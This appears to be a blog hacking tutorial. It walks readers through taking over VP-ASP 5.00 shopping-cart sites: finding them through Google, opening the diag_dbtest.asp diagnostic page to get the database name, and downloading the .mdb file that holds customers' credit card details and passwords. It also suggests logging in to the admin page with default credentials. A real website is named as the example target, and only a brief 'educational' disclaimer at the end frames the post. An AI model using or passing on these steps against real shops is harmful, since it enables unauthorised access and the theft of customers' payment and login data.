How to hack VP-ASP Shopping websites and get all the Database details
Hello Friends, Today we are going to learn how to hack VP-ASP cart of a Shopping website and download all their Database details like Customer details, Credit card details, Product details etc.
So some basic idea before starting the Tutorial,
What we are going to do here?
Firstly we will hack a shopadmin website then we will download the database file which will be in the form of *.mdb. This database file contains all the client details like credit card information and also login name and passwords.
How to do this ?
Note : This tutorial is tested on "VP-ASP Shopping Cart Version:5.00"
Step 1 : First thing to do is to find VP-ASP 5.00 Sites, to do this -> Go to Google.com -> Type "VP-ASP Shopping Cart 5.00"[ Without Quotes ] . See the image for reference
Step 2 : In this tutorial, we are going to target www.surfstats.com You can also select your website which is having "shopdisplaycategories.asp","shopadmin.asp" at the end of the URL. Since SURFSTATS have "shopdisplaycategories.asp" at the end of URL, we will target this.
Now lets go to the Exploit,
The exploit is : diag_dbtest.asp
Just change the website URL from "http://www.surfstats.com/eCommerce/vpasp/shopdisplaycategories.asp" to "http://www.surfstats.com/eCommerce/vpasp/diag_dbtest.asp"
Step 3 : A page will appear containing xDatabase, xDBLocation, xEmail etc. See the image below.
Step 4 : The most important thing here is "xDatabase". Depending on the websites, xDatabase name will vary like for some websites it will be "shopping140 , shopping500 or shopping550"
For us xDatabase=shopping500
so what we have to do, just add xDatabase name in the URL alongwith the extension *.mdb i.e.
"http://www.surfstats.com/eCommerce/vpasp/shopping500.mdb" and ENTER -> It will download the database file into your local machine.
If in case the database file is not getting downloaded then
give the database location(XDBLocation) before the shopping*.mdb URL example : "http://www.victim.com/[Dblocation]/shopping500.mdb"
Step 5 : Download the *.mdb file and you should be able to open it with any mdb file viewer like Microsoft Office Access.
Inside the file you will be able to find credit card details information, if you are lucky enough you may get details of username and password of customers etc.
Step 6 : The Admin Login page is usually located here : http://www.victim.com/*/shopadmin.asp, for us its :
If you are not able to find the admin Username and Password on the *.mdb file or if its incorrect then try to find admin login page and enter the default password like:
Username : admin
Password : admin
Username : vpasp
Password : vpasp
Hope you all will like the tutorial and help us to spread knowledge because its FREE. Share it!!
For any queries comment below.
Note: Hacking website is an illegal act, this is only a informational post and I am not responsible for any actions done to you after reading this tutorial. This post is for educational purposes only.